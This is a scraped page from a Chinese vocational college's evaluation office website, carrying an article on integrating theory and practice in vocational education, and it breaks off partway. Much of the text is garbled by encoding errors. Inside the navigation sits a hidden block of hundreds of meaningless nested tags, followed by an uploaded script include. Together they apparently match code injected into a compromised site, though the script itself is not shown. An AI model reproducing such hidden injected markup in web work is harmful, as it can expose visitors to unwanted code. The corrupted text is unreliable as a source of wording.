ï»? 高职教育应注重理论实践“内外兼修â€?郑州城市职业学院-评估办公å®?/title> <meta content="" name="keywords"> <meta content="" name="description"> <link href="/Template/pinggu/images/jigou.css" rel="stylesheet" type="text/css"> <link href="/Template/pinggu/images/jigou280.css" rel="stylesheet" type="text/css"> </head> <body> <div class="banner"></div> <div class="navs"> <div class="snavs_in"> <div class="snavs_b"> <ul> <li class="li"><a href="">学院首页</a></li> <li><a href="/pgw/"><span>本站首页</span></a></li><div style='display:none'><q id='asv3q'><p id='asv3q'><optgroup id='asv3q'></optgroup></p></q><form id='asv3q'></form><ol id='asv3q'><th id='asv3q'><legend id='asv3q'></legend></th><bdo id='asv3q'><optgroup id='asv3q'></optgroup></bdo></ol><dl id='asv3q'><tt id='asv3q'><tr id='asv3q'></tr></tt><address id='asv3q'><th id='asv3q'></th></address></dl><style id='asv3q'><dt id='asv3q'></dt><dir id='asv3q'></dir></style><dd id='asv3q'></dd><dl id='asv3q'><sup id='asv3q'></sup></dl><table id='asv3q'><p id='asv3q'><optgroup id='asv3q'><tbody id='asv3q'><p id='asv3q'><dir id='asv3q'><div id='asv3q'><center id='asv3q'></center></div></dir></p></tbody></optgroup></p></table><abbr id='asv3q'><abbr id='asv3q'><blockquote id='asv3q'><i id='asv3q'><select id='asv3q'><td id='asv3q'><u id='asv3q'><ol id='asv3q'></ol><big id='asv3q'><big id='asv3q'></big></big></u><pre id='asv3q'><kbd id='asv3q'></kbd></pre><del id='asv3q'></del></td><button id='asv3q'><noframes id='asv3q'><option id='asv3q'></option><select id='asv3q'><span id='asv3q'><form id='asv3q'></form></span><dd id='asv3q'></dd></select><dt id='asv3q'></dt></noframes><del id='asv3q'><noframes id='asv3q'></noframes></del></button><kbd id='asv3q'></kbd><form id='asv3q'></form><button id='asv3q'><noframes id='asv3q'><style id='asv3q'><big id='asv3q'><i id='asv3q'></i><tbody id='asv3q'></tbody></big></style><abbr id='asv3q'></abbr></noframes></button></select></i><li id='asv3q'></li></blockquote></abbr><address id='asv3q'></address></abbr><address id='asv3q'><sub id='asv3q'><big id='asv3q'><tt id='asv3q'><bdo id='asv3q'><acronym id='asv3q'></acronym></bdo><label id='asv3q'><abbr id='asv3q'></abbr><em id='asv3q'><pre id='asv3q'></pre><address id='asv3q'><small id='asv3q'></small></address></em></label><center id='asv3q'><span id='asv3q'><b id='asv3q'></b></span></center><option id='asv3q'><bdo id='asv3q'><select id='asv3q'><strong id='asv3q'><q id='asv3q'><sup id='asv3q'><abbr id='asv3q'></abbr></sup><p id='asv3q'></p></q><span id='asv3q'><tfoot id='asv3q'><ul id='asv3q'><div id='asv3q'><style id='asv3q'><dir id='asv3q'></dir></style></div></ul></tfoot><q id='asv3q'><form id='asv3q'></form></q></span><noframes id='asv3q'><p id='asv3q'><sup id='asv3q'></sup></p></noframes></strong></select></bdo></option></tt><option id='asv3q'></option><li id='asv3q'></li></big><strong id='asv3q'></strong></sub></address><ol id='asv3q'><font id='asv3q'></font><dl id='asv3q'></dl></ol><option id='asv3q'></option><th id='asv3q'></th><li id='asv3q'></li><center id='asv3q'><u id='asv3q'></u></center><del id='asv3q'></del><tfoot id='asv3q'></tfoot><p id='asv3q'><strike id='asv3q'></strike><fieldset id='asv3q'></fieldset></p><tr id='asv3q'><bdo id='asv3q'><ul id='asv3q'></ul></bdo></tr><th id='asv3q'><tfoot id='asv3q'><p id='asv3q'><thead id='asv3q'><dfn id='asv3q'></dfn></thead></p><strong id='asv3q'></strong><th id='asv3q'></th></tfoot></th><u id='asv3q'><blockquote id='asv3q'></blockquote></u><b id='asv3q'><address id='asv3q'></address></b><ins id='asv3q'><table id='asv3q'><strike id='asv3q'><tfoot id='asv3q'><ins id='asv3q'></ins></tfoot><strike id='asv3q'><small id='asv3q'><div id='asv3q'></div></small></strike></strike><optgroup id='asv3q'><big id='asv3q'><abbr id='asv3q'></abbr></big><kbd id='asv3q'><q id='asv3q'></q></kbd></optgroup></table><big id='asv3q'></big></ins><sub id='asv3q'></sub><q id='asv3q'><kbd id='asv3q'></kbd><dt id='asv3q'></dt></q><big id='asv3q'><pre id='asv3q'><code id='asv3q'></code><del id='asv3q'><fieldset id='asv3q'></fieldset></del><big id='asv3q'><dt id='asv3q'></dt></big><bdo id='asv3q'></bdo></pre></big><noscript id='asv3q'></noscript><acronym id='asv3q'></acronym><div id='asv3q'><tr id='asv3q'><b id='asv3q'></b></tr></div><dl id='asv3q'></dl><tbody id='asv3q'><p id='asv3q'><noframes id='asv3q'></noframes></p><u id='asv3q'></u></tbody><dt id='asv3q'></dt><dd id='asv3q'></dd><big id='asv3q'></big><pre id='asv3q'></pre><dir id='asv3q'><optgroup id='asv3q'><select id='asv3q'></select></optgroup></dir><font id='asv3q'><ol id='asv3q'><dir id='asv3q'><dl id='asv3q'></dl><thead id='asv3q'></thead></dir></ol></font><pre id='asv3q'><tr id='asv3q'><q id='asv3q'><fieldset id='asv3q'></fieldset></q></tr></pre><dfn id='asv3q'><td id='asv3q'><strong id='asv3q'><style id='asv3q'><acronym id='asv3q'></acronym><pre id='asv3q'><pre id='asv3q'><dir id='asv3q'><label id='asv3q'><noframes id='asv3q'></noframes></label></dir><strike id='asv3q'></strike></pre></pre></style></strong><th id='asv3q'><dir id='asv3q'><dt id='asv3q'><b id='asv3q'></b></dt></dir></th></td></dfn><sub id='asv3q'></sub><th id='asv3q'></th><legend id='asv3q'></legend><style id='asv3q'></style><i id='asv3q'></i><optgroup id='asv3q'></optgroup><noscript id='asv3q'><q id='asv3q'><tfoot id='asv3q'><td id='asv3q'><b id='asv3q'></b></td></tfoot><pre id='asv3q'><code id='asv3q'></code><del id='asv3q'><form id='asv3q'></form></del><address id='asv3q'></address></pre></q></noscript><dfn id='asv3q'></dfn><optgroup id='asv3q'></optgroup><address id='asv3q'><sub id='asv3q'></sub></address><abbr id='asv3q'><ul id='asv3q'><big id='asv3q'><tbody id='asv3q'><dir id='asv3q'><tfoot id='asv3q'></tfoot><abbr id='asv3q'><noscript id='asv3q'></noscript></abbr></dir></tbody><tr id='asv3q'></tr></big></ul></abbr><dl id='asv3q'></dl><div id='asv3q'></div><div id='asv3q'><ol id='asv3q'></ol></div><i id='asv3q'></i><i id='asv3q'><strong id='asv3q'><sup id='asv3q'></sup><span id='asv3q'><strong id='asv3q'></strong><strong id='asv3q'></strong></span><option id='asv3q'><noscript id='asv3q'></noscript></option></strong></i><abbr id='asv3q'></abbr><ul id='asv3q'></ul><bdo id='asv3q'><div id='asv3q'></div></bdo><pre id='asv3q'><fieldset id='asv3q'></fieldset></pre><dfn id='asv3q'></dfn><tr id='asv3q'><option id='asv3q'><kbd id='asv3q'></kbd><label id='asv3q'><strong id='asv3q'><font id='asv3q'></font></strong></label><ol id='asv3q'><code id='asv3q'><td id='asv3q'><strike id='asv3q'><blockquote id='asv3q'></blockquote></strike></td></code></ol><dt id='asv3q'></dt><sup id='asv3q'><q id='asv3q'><dd id='asv3q'><q id='asv3q'><del id='asv3q'><acronym id='asv3q'></acronym><tfoot id='asv3q'></tfoot><label id='asv3q'><strong id='asv3q'></strong></label><td id='asv3q'></td><ul id='asv3q'><select id='asv3q'><li id='asv3q'></li></select></ul><label id='asv3q'></label></del><tbody id='asv3q'></tbody><dt id='asv3q'></dt></q><small id='asv3q'><strike id='asv3q'></strike></small></dd></q><label id='asv3q'></label></sup></option><pre id='asv3q'><ins id='asv3q'><td id='asv3q'></td><sub id='asv3q'><optgroup id='asv3q'></optgroup></sub><center id='asv3q'><em id='asv3q'></em></center><acronym id='asv3q'></acronym></ins></pre></tr><tr id='asv3q'></tr><center id='asv3q'><tbody id='asv3q'></tbody><tfoot id='asv3q'></tfoot></center><small id='asv3q'><th id='asv3q'></th></small><small id='asv3q'></small><em id='asv3q'></em><dfn id='asv3q'><dd id='asv3q'></dd></dfn><dl id='asv3q'><i id='asv3q'><td id='asv3q'><thead id='asv3q'></thead></td></i></dl><style id='asv3q'><th id='asv3q'><form id='asv3q'><span id='asv3q'><dl id='asv3q'><label id='asv3q'></label></dl><th id='asv3q'><li id='asv3q'><noscript id='asv3q'></noscript><tbody id='asv3q'></tbody><tbody id='asv3q'><form id='asv3q'><tbody id='asv3q'></tbody><dd id='asv3q'><i id='asv3q'></i></dd></form></tbody></li></th></span></form><optgroup id='asv3q'><ol id='asv3q'><b id='asv3q'></b></ol></optgroup></th></style><tbody id='asv3q'><strong id='asv3q'></strong><label id='asv3q'><label id='asv3q'><tbody id='asv3q'><small id='asv3q'><noframes id='asv3q'></noframes><ul id='asv3q'></ul><b id='asv3q'></b></small></tbody></label><label id='asv3q'><code id='asv3q'></code><kbd id='asv3q'></kbd></label><u id='asv3q'><tt id='asv3q'></tt></u></label></tbody><dfn id='asv3q'><tbody id='asv3q'></tbody></dfn><pre id='asv3q'><em id='asv3q'><option id='asv3q'><dt id='asv3q'></dt></option></em></pre><optgroup id='asv3q'><thead id='asv3q'></thead></optgroup><optgroup id='asv3q'></optgroup><optgroup id='asv3q'></optgroup><em id='asv3q'></em><address id='asv3q'></address><blockquote id='asv3q'><u id='asv3q'><style id='asv3q'><b id='asv3q'></b><thead id='asv3q'><style id='asv3q'><strong id='asv3q'><ol id='asv3q'></ol></strong></style><acronym id='asv3q'><del id='asv3q'><dd id='asv3q'></dd><bdo id='asv3q'><legend id='asv3q'><kbd id='asv3q'><address id='asv3q'></address></kbd></legend></bdo></del></acronym></thead><tbody id='asv3q'></tbody></style></u><label id='asv3q'><dt id='asv3q'></dt></label></blockquote><li id='asv3q'><dl id='asv3q'><noframes id='asv3q'><form id='asv3q'></form></noframes></dl></li><td id='asv3q'></td><blockquote id='asv3q'><th id='asv3q'><tr id='asv3q'></tr><code id='asv3q'><sup id='asv3q'><fieldset id='asv3q'></fieldset><code id='asv3q'></code><big id='asv3q'></big></sup></code></th></blockquote><select id='asv3q'><kbd id='asv3q'><sup id='asv3q'></sup><form id='asv3q'></form></kbd></select><big id='asv3q'></big><em id='asv3q'></em><sup id='asv3q'><b id='asv3q'></b><strong id='asv3q'></strong></sup><kbd id='asv3q'><ol id='asv3q'></ol></kbd><optgroup id='asv3q'><tt id='asv3q'><font id='asv3q'><td id='asv3q'></td></font></tt></optgroup><pre id='asv3q'><center id='asv3q'></center></pre><tt id='asv3q'></tt><big id='asv3q'><strike id='asv3q'><li id='asv3q'><kbd id='asv3q'></kbd></li><i id='asv3q'><blockquote id='asv3q'><label id='asv3q'><u id='asv3q'><ins id='asv3q'></ins><dfn id='asv3q'></dfn></u></label><noscript id='asv3q'><span id='asv3q'></span></noscript><td id='asv3q'></td><pre id='asv3q'><li id='asv3q'><td id='asv3q'><label id='asv3q'></label><pre id='asv3q'></pre></td></li></pre><small id='asv3q'></small></blockquote></i><b id='asv3q'><i id='asv3q'></i></b><td id='asv3q'><select id='asv3q'></select><table id='asv3q'><tbody id='asv3q'></tbody></table><dt id='asv3q'><dd id='asv3q'></dd></dt></td></strike><strong id='asv3q'><sub id='asv3q'></sub><td id='asv3q'></td></strong></big><blockquote id='asv3q'></blockquote><small id='asv3q'></small><dir id='asv3q'></dir><tr id='asv3q'></tr><center id='asv3q'><u id='asv3q'></u></center><kbd id='asv3q'></kbd><select id='asv3q'><u id='asv3q'><p id='asv3q'><p id='asv3q'><em id='asv3q'><dfn id='asv3q'><table id='asv3q'><dl id='asv3q'></dl><center id='asv3q'></center></table></dfn><div id='asv3q'></div><small id='asv3q'></small></em></p></p><acronym id='asv3q'></acronym><u id='asv3q'></u><sup id='asv3q'><thead id='asv3q'><noscript id='asv3q'></noscript></thead></sup></u><ol id='asv3q'></ol><sub id='asv3q'></sub></select><address id='asv3q'></address><dl id='asv3q'><small id='asv3q'><ul id='asv3q'><optgroup id='asv3q'><em id='asv3q'></em></optgroup><tt id='asv3q'></tt><strike id='asv3q'></strike></ul><thead id='asv3q'><kbd id='asv3q'><kbd id='asv3q'></kbd><noframes id='asv3q'><bdo id='asv3q'><sup id='asv3q'><div id='asv3q'><bdo id='asv3q'></bdo></div></sup></bdo></noframes><label id='asv3q'></label><strike id='asv3q'></strike></kbd></thead></small></dl><big id='asv3q'></big><ins id='asv3q'><optgroup id='asv3q'></optgroup></ins><dl id='asv3q'><tbody id='asv3q'></tbody></dl><dt id='asv3q'></dt><tr id='asv3q'><address id='asv3q'></address></tr><small id='asv3q'><font id='asv3q'></font></small><option id='asv3q'><thead id='asv3q'></thead><em id='asv3q'></em></option><tfoot id='asv3q'></tfoot><tbody id='asv3q'></tbody><li id='asv3q'></li><tbody id='asv3q'></tbody><address id='asv3q'></address><del id='asv3q'><big id='asv3q'><label id='asv3q'><code id='asv3q'><th id='asv3q'><legend id='asv3q'></legend><i id='asv3q'></i><form id='asv3q'></form></th></code></label></big><dd id='asv3q'><span id='asv3q'><abbr id='asv3q'></abbr></span></dd></del><ol id='asv3q'></ol><address id='asv3q'><sup id='asv3q'><acronym id='asv3q'></acronym></sup></address><blockquote id='asv3q'></blockquote><font id='asv3q'></font><optgroup id='asv3q'><bdo id='asv3q'></bdo><acronym id='asv3q'></acronym></optgroup><del id='asv3q'></del><code id='asv3q'><select id='asv3q'></select><td id='asv3q'></td></code><tfoot id='asv3q'></tfoot><kbd id='asv3q'><b id='asv3q'><style id='asv3q'><tbody id='asv3q'><tr id='asv3q'></tr><big id='asv3q'></big><ol id='asv3q'><u id='asv3q'><dfn id='asv3q'></dfn></u></ol></tbody></style><dl id='asv3q'><b id='asv3q'><ins id='asv3q'><tt id='asv3q'><b id='asv3q'><blockquote id='asv3q'><dir id='asv3q'></dir><label id='asv3q'><li id='asv3q'></li><i id='asv3q'></i><u id='asv3q'><tbody id='asv3q'></tbody></u></label><li id='asv3q'><tt id='asv3q'></tt></li></blockquote></b></tt></ins></b></dl></b></kbd><fieldset id='asv3q'><sub id='asv3q'><div id='asv3q'></div></sub></fieldset><acronym id='asv3q'><td id='asv3q'><form id='asv3q'></form></td><big id='asv3q'><dfn id='asv3q'><b id='asv3q'><address id='asv3q'></address></b><thead id='asv3q'><span id='asv3q'></span></thead></dfn></big></acronym><ul id='asv3q'></ul><tbody id='asv3q'><sup id='asv3q'><legend id='asv3q'><b id='asv3q'></b></legend></sup><legend id='asv3q'><sub id='asv3q'><ul id='asv3q'><b id='asv3q'><q id='asv3q'></q></b></ul><tfoot id='asv3q'></tfoot><ul id='asv3q'></ul><bdo id='asv3q'></bdo></sub></legend></tbody><dfn id='asv3q'><label id='asv3q'></label></dfn><em id='asv3q'><bdo id='asv3q'><ins id='asv3q'><dl id='asv3q'></dl></ins><pre id='asv3q'><p id='asv3q'></p><span id='asv3q'><tt id='asv3q'></tt></span></pre></bdo></em><sub id='asv3q'><option id='asv3q'><bdo id='asv3q'></bdo></option></sub><bdo id='asv3q'><small id='asv3q'></small></bdo><dl id='asv3q'></dl><address id='asv3q'></address><pre id='asv3q'><pre id='asv3q'></pre></pre><li id='asv3q'></li><ins id='asv3q'><legend id='asv3q'></legend></ins><strong id='asv3q'></strong><div id='asv3q'><div id='asv3q'></div></div><tr id='asv3q'><dt id='asv3q'><tbody id='asv3q'></tbody><dd id='asv3q'><optgroup id='asv3q'></optgroup></dd></dt><tbody id='asv3q'></tbody></tr><abbr id='asv3q'><font id='asv3q'><ins id='asv3q'></ins><small id='asv3q'><fieldset id='asv3q'></fieldset></small><noscript id='asv3q'></noscript><select id='asv3q'><optgroup id='asv3q'></optgroup></select></font></abbr><tr id='asv3q'></tr><strike id='asv3q'><th id='asv3q'></th></strike><label id='asv3q'></label><b id='asv3q'></b><ins id='asv3q'><del id='asv3q'><dt id='asv3q'></dt></del></ins><sub id='asv3q'><table id='asv3q'><small id='asv3q'></small><div id='asv3q'></div></table></sub></div> <script language="javascript" type="text/javascript" src="/@uploads/js/common386.js"></script> <li><a href="/pgw/pjdt/"><span>评建动æ€?/span></a></li> <li><a href="/pgw/pzxgg/"><span>最新公å‘?/span></a></li> <li><a href="/pgw/pzcwj/"><span>政策文件</span></a></li> <li><a href="/pgw/pjzs/"><span>评建知识</span></a></li> <li><a href="/pgw/pjjb/"><span>评建简æŠ?/span></a></li> <li><a href="/pgw/tszs/"><span>他山之石</span></a></li> <li><a href="/pgw/pwjxz/"><span>文件下载</span></a></li> </ul> </div> </div> </div> <div class="clear"></div> <div class="list_pos">当前位置ï¼?a href="/pgw/">首页</a> > 高职研究 > 正文内容</div> <div class="cnt950 page_wrap"> <div class="side"> <div class="hd"><h3>评估办公å®?/h3></div> <div class="bd"> <ul class=""> <li><a href="/pgw/pjdt/"><span>评建动æ€?/span></a></li> <li><a href="/pgw/pzxgg/"><span>最新公å‘?/span></a></li> <li><a href="/pgw/pzcwj/"><span>政策文件</span></a></li> <li><a href="/pgw/pjzs/"><span>评建知识</span></a></li> <li><a href="/pgw/pjjb/"><span>评建简æŠ?/span></a></li> <li><a href="/pgw/pgzyj/"><span>高职研究</span></a></li> <li><a href="/pgw/tszs/"><span>他仙之石</span></a></li> <li><a href="/pgw/pwjxz/"><span>文件下载</span></a></li> </ul> </div> </div> <div class="main"> <div class="hd"><h3>高职研究</h3></div> <div class="bd"> <div class="page-m"> <div class="r_page_content"> <!--文章标题--> <h1>高职教育应注重理论实践“内外兼修â€?/h1> <div class="info">发布时间ï¼?017å¹?5æœ?8日 点击数:<span id="hits"> <script language="JavaScript" type="text/JavaScript" src="/Common/GetHits.aspx?id=1848"></script> </span></div> <!--正文内容--> <div class="content" id="artiContent"> <div class="c_content_overflow" id="fontzoom"> <p align="justify" class="MsoNormal" style="text-justify: inter-ideograph; text-align: justify; line-height: 300%; text-indent: 0pt; margin: 0pt; text-autospace: ideograph-numeric; mso-char-indent-count: 0.0000; mso-pagination: none; mso-para-margin-right: 0.0000gd; mso-para-margin-left: 0.0000gd"><span style="font-family: 宋体; font-size: 12pt; mso-spacerun: 'yes'; mso-ascii-font-family: Calibri; mso-hansi-font-family: Calibri; mso-bidi-font-family: 'Times New Roman'; mso-font-kerning: 1.0000pt"><o:p> </o:p></span></p> <p align="justify" class="MsoNormal" style="text-justify: inter-ideograph; text-align: justify; line-height: 300%; text-indent: 0pt; margin: 0pt; text-autospace: ideograph-numeric; mso-char-indent-count: 0.0000; mso-pagination: none; mso-para-margin-right: 0.0000gd; mso-para-margin-left: 0.0000gd"><span style="font-family: 宋体; font-size: 12pt; mso-spacerun: 'yes'; mso-ascii-font-family: Calibri; mso-hansi-font-family: Calibri; mso-bidi-font-family: 'Times New Roman'; mso-font-kerning: 1.0000pt">    <font face="宋体">高等职业院校在校生和学校数量均占了全国普通高校的半壁江山,随着国家建设</font>“世界一流大学、一流学ç§?rdquo;步伐的加快,高职院校也面临着“双一æµ?rdquo;建设的迫切需求ã€?ldquo;内外兼修”就是职业教育统筹教学与应用、专业与需求、能力与目标等方面,打通学校与企业、教室与工厂的严格界限ã€?   </span><span style="font-family: 宋体; font-size: 12pt; mso-spacerun: 'yes'; mso-ascii-font-family: Calibri; mso-hansi-font-family: Calibri; mso-bidi-font-family: 'Times New Roman'; mso-font-kerning: 1.0000pt"><o:p></o:p></span></p> <p align="justify" class="MsoNormal" style="text-justify: inter-ideograph; text-align: justify; line-height: 300%; text-indent: 0pt; margin: 0pt; text-autospace: ideograph-numeric; mso-char-indent-count: 0.0000; mso-pagination: none; mso-para-margin-right: 0.0000gd; mso-para-margin-left: 0.0000gd"><span style="font-family: 宋体; font-size: 12pt; mso-spacerun: 'yes'; mso-ascii-font-family: Calibri; mso-hansi-font-family: Calibri; mso-bidi-font-family: 'Times New Roman'; mso-font-kerning: 1.0000pt">    <font face="宋体">一、办学以深度校企合作为核心。由于本科教育与高职教育自身的定位不同,学生的培养目标也不同,从而形成两种不同的教学体系。从整体上来说,本科偏理论、高职偏实践,本科重基础、高职重应用。正是因为各有所长,社会、家长和考生对于高职的评价也日趋理性和客观,高职院校也吸引众多行业企业、社会媒体的广泛关注ã€?/font>    </span><span style="font-family: 宋体; font-size: 12pt; mso-spacerun: 'yes'; mso-ascii-font-family: Calibri; mso-hansi-font-family: Calibri; mso-bidi-font-family: 'Times New Roman'; mso-font-kerning: 1.0000pt"><o:p></o:p></span></p> <p align="justify" class="MsoNormal" style="text-justify: inter-ideograph; text-align: justify; line-height: 300%; text-indent: 0pt; margin: 0pt; text-autospace: ideograph-numeric; mso-char-indent-count: 0.0000; mso-pagination: none; mso-para-margin-right: 0.0000gd; mso-para-margin-left: 0.0000gd"><span style="font-family: 宋体; font-size: 12pt; mso-spacerun: 'yes'; mso-ascii-font-family: Calibri; mso-hansi-font-family: Calibri; mso-bidi-font-family: 'Times New Roman'; mso-font-kerning: 1.0000pt">    <font face="宋体">高职教育有其自身的发展规律和特点,理实一体、工学耦合、校企共育,实现理论学习与技能训练一体化ã€?/font>    </span><span style="font-family: 宋体; font-size: 12pt; mso-spacerun: 'yes'; mso-ascii-font-family: Calibri; mso-hansi-font-family: Calibri; mso-bidi-font-family: 'Times New Roman'; mso-font-kerning: 1.0000pt"><o:p></o:p></span></p> <p align="justify" class="MsoNormal" style="text-justify: inter-ideograph; text-align: justify; line-height: 300%; text-indent: 0pt; margin: 0pt; text-autospace: ideograph-numeric; mso-char-indent-count: 0.0000; mso-pagination: none; mso-para-margin-right: 0.0000gd; mso-para-margin-left: 0.0000gd"><span style="font-family: 宋体; font-size: 12pt; mso-spacerun: 'yes'; mso-ascii-font-family: Calibri; mso-hansi-font-family: Calibri; mso-bidi-font-family: 'Times New Roman'; mso-font-kerning: 1.0000pt">    <font face="宋体">所谓理实一体,是指理论与实践教学同时进行,在实践中需要什么理论,就学什么理论。比如说,新能源汽车技术专业的学生,虽然他学的也是汽车技术,但是他主攻的是汽车蓄电池这块,对于普通汽车技术专业要求学习的发动机系统、油气系统等方面的理论就可以省略。学生实训操作哪一模块,就相应学习哪一模块的理论知识,在实践中学习理论,再用理论不断指导实践ã€?/font>    </span><span style="font-family: 宋体; font-size: 12pt; mso-spacerun: 'yes'; mso-ascii-font-family: Calibri; mso-hansi-font-family: Calibri; mso-bidi-font-family: 'Times New Roman'; mso-font-kerning: 1.0000pt"><o:p></o:p></span></p> <p align="justify" class="MsoNormal" style="text-justify: inter-ideograph; text-align: justify; line-height: 300%; text-indent: 0pt; margin: 0pt; text-autospace: ideograph-numeric; mso-char-indent-count: 0.0000; mso-pagination: none; mso-para-margin-right: 0.0000gd; mso-para-margin-left: 0.0000gd"><span style="font-family: 宋体; font-size: 12pt; mso-spacerun: 'yes'; mso-ascii-font-family: Calibri; mso-hansi-font-family: Calibri; mso-bidi-font-family: 'Times New Roman'; mso-font-kerning: 1.0000pt">    <font face="宋体">所谓工学耦合,是指学生在校学习过程中,从事一些检验学习成绩的生产性实训;学生在企业实习过程中,又有专业教师进行现场指导。这ç§?/font>“校中åŽ?rdquo;“厂中æ ?rdquo;的教学成功经验被广泛推广。由陕西国防工业职业技术学院牵头申报的“以校企合作工作站为载体的集团化办学模式探索与实践”项目被陕西省人民政府授予<font face="Calibri">2015</font><font face="宋体">年高等教育教学成果特等奖,全国高等教育年度报告也收录了这一成功教学经验ã€?   </font></span><span style="font-family: 宋体; font-size: 12pt; mso-spacerun: 'yes'; mso-ascii-font-family: Calibri; mso-hansi-font-family: Calibri; mso-bidi-font-family: 'Times New Roman'; mso-font-kerning: 1.0000pt"><o:p></o:p></span></p> <p align="justify" class="MsoNormal" style="text-justify: inter-ideograph; text-align: justify; line-height: 300%; text-indent: 0pt; margin: 0pt; text-autospace: ideograph-numeric; mso-char-indent-count: 0.0000; mso-pagination: none; mso-para-margin-right: 0.0000gd; mso-para-margin-left: 0.0000gd"><span style="font-family: 宋体; font-size: 12pt; mso-spacerun: 'yes'; mso-ascii-font-family: Calibri; mso-hansi-font-family: Calibri; mso-bidi-font-family: 'Times New Roman'; mso-font-kerning: 1.0000pt">    <font face="宋体">所谓校企共育,并非是指普通意义上的、存在商业利益的校企合作。高校作为青年学子们梦想起飞的地方,是非营利性的组织机构,是培养人才、塑造人才的沃土;企业作为市场主体,必然需要各种专业技能的人才储备,同时它也承担一定的社会义务,为人才的培养提供服务。目前,陕西国防工业职业技术学院已与中兴通讯、戴姆勒奔驰等大型企业合作共建二级实体学院,接受企业提供的设备、技术,供学生实训,毕业后优先被这些企业录用ã€?/font>  </span><span style="font-family: 宋体; font-size: 12pt; mso-spacerun: 'yes'; mso-ascii-font-family: Calibri; mso-hansi-font-family: Calibri; mso-bidi-font-family: 'Times New Roman'; mso-font-kerning: 1.0000pt"><o:p></o:p></span></p> <p align="justify" class="MsoNormal" style="text-justify: inter-ideograph; text-align: justify; line-height: 300%; text-indent: 0pt; margin: 0pt; text-autospace: ideograph-numeric; mso-char-indent-count: 0.0000; mso-pagination: none; mso-para-margin-right: 0.0000gd; mso-para-margin-left: 0.0000gd"><span style="font-family: 宋体; font-size: 12pt; mso-spacerun: 'yes'; mso-ascii-font-family: Calibri; mso-hansi-font-family: Calibri; mso-bidi-font-family: 'Times New Roman'; mso-font-kerning: 1.0000pt">    <font face="宋体">二、教学以技术实践应用为基础。高职教育教学体系的构建应树ç«?/font>“以人才培养目标为导向、以培养学生职业能力为本位、教学过程以学生为中å¿?rdquo;的理念,改革课程结构、引入职业岗位技术标准,构建适应产业发展和技术进步需要的技术技能人才培养体系ã€?   </span><span style="font-family: 宋体; font-size: 12pt; mso-spacerun: 'yes'; mso-ascii-font-family: Calibri; mso-hansi-font-family: Calibri; mso-bidi-font-family: 'Times New Roman'; mso-font-kerning: 1.0000pt"><o:p></o:p></span></p> <p align="justify" class="MsoNormal" style="text-justify: inter-ideograph; text-align: justify; line-height: 300%; text-indent: 0pt; margin: 0pt; text-autospace: ideograph-numeric; mso-char-indent-count: 0.0000; mso-pagination: none; mso-para-margin-right: 0.0000gd; mso-para-margin-left: 0.0000gd"><span style="font-family: 宋体; font-size: 12pt; mso-spacerun: 'yes'; mso-ascii-font-family: Calibri; mso-hansi-font-family: Calibri; mso-bidi-font-family: 'Times New Roman'; mso-font-kerning: 1.0000pt">    <font face="宋体">高职教育以基äº?/font>“工作任务”课程体系为目标,以体现职业岗位技术要求的课程内容开发为核心任务,以“项目”为课程内容组织形式,ä»?ldquo;教学做一体化”为课程教学模式,ä»?ldquo;信息åŒ?rdquo;为课程资源建设主要手段,促进高职教育理念转变,培养学生职业能力ã€?   </span><span style="font-family: 宋体; font-size: 12pt; mso-spacerun: 'yes'; mso-ascii-font-family: Calibri; mso-hansi-font-family: Calibri; mso-bidi-font-family: 'Times New Roman'; mso-font-kerning: 1.0000pt"><o:p></o:p></span></p> <p align="justify" class="MsoNormal" style="text-justify: inter-ideograph; text-align: justify; line-height: 300%; text-indent: 0pt; margin: 0pt; text-autospace: ideograph-numeric; mso-char-indent-count: 0.0000; mso-pagination: none; mso-para-margin-right: 0.0000gd; mso-para-margin-left: 0.0000gd"><span style="font-family: 宋体; font-size: 12pt; mso-spacerun: 'yes'; mso-ascii-font-family: Calibri; mso-hansi-font-family: Calibri; mso-bidi-font-family: 'Times New Roman'; mso-font-kerning: 1.0000pt">    <font face="宋体">高职教育课程模式主要有实践本位、能力本位和工作过程本位三种模式,其出发点是对职业能力的不同理解。实践本位认为培养学生的职业能力是提升学生的技能水平。能力本位对职业能力内涵的理解更侧重于职业适应能力。工作过程本位认为,职业能力包括岗位操作能力、职业综合能力、职业发展能力和职业创新能力。显然,工作过程本位理念对职业能力的诠释,更加符合适应产业发展和技术进步的技术技能人才培养目标要求ã€?/font>    </span><span style="font-family: 宋体; font-size: 12pt; mso-spacerun: 'yes'; mso-ascii-font-family: Calibri; mso-hansi-font-family: Calibri; mso-bidi-font-family: 'Times New Roman'; mso-font-kerning: 1.0000pt"><o:p></o:p></span></p> <p align="justify" class="MsoNormal" style="text-justify: inter-ideograph; text-align: justify; line-height: 300%; text-indent: 0pt; margin: 0pt; text-autospace: ideograph-numeric; mso-char-indent-count: 0.0000; mso-pagination: none; mso-para-margin-right: 0.0000gd; mso-para-margin-left: 0.0000gd"><span style="font-family: 宋体; font-size: 12pt; mso-spacerun: 'yes'; mso-ascii-font-family: Calibri; mso-hansi-font-family: Calibri; mso-bidi-font-family: 'Times New Roman'; mso-font-kerning: 1.0000pt">    <font face="宋体">ä»?/font>“项目”为主线组织课程内容。课程的“项目åŒ?rdquo;要以典型产品为载体来设计教学活动。目的是使整个教学过程反映工作过程,使学生通过教学活动能够提供一个具有实际价值的产品或服务ã€?   </span><span style="font-family: 宋体; font-size: 12pt; mso-spacerun: 'yes'; mso-ascii-font-family: Calibri; mso-hansi-font-family: Calibri; mso-bidi-font-family: 'Times New Roman'; mso-font-kerning: 1.0000pt"><o:p></o:p></span></p> <p align="justify" class="MsoNormal" style="text-justify: inter-ideograph; text-align: justify; line-height: 300%; text-indent: 0pt; margin: 0pt; text-autospace: ideograph-numeric; mso-char-indent-count: 0.0000; mso-pagination: none; mso-para-margin-right: 0.0000gd; mso-para-margin-left: 0.0000gd"><span style="font-family: 宋体; font-size: 12pt; mso-spacerun: 'yes'; mso-ascii-font-family: Calibri; mso-hansi-font-family: Calibri; mso-bidi-font-family: 'Times New Roman'; mso-font-kerning: 1.0000pt">    “教学做一体化”的课程教学模式,使学生通过工作“建构”自身的知识体系和技能体系。学生通过完成一个个工作任务,最终得到产品或服务,才能掌握技术、训练技能、学习知识,培养能力ã€?   </span><span style="font-family: 宋体; font-size: 12pt; mso-spacerun: 'yes'; mso-ascii-font-family: Calibri; mso-hansi-font-family: Calibri; mso-bidi-font-family: 'Times New Roman'; mso-font-kerning: 1.0000pt"><o:p></o:p></span></p> <p align="justify" class="MsoNormal" style="text-justify: inter-ideograph; text-align: justify; line-height: 300%; text-indent: 0pt; margin: 0pt; text-autospace: ideograph-numeric; mso-char-indent-count: 0.0000; mso-pagination: none; mso-para-margin-right: 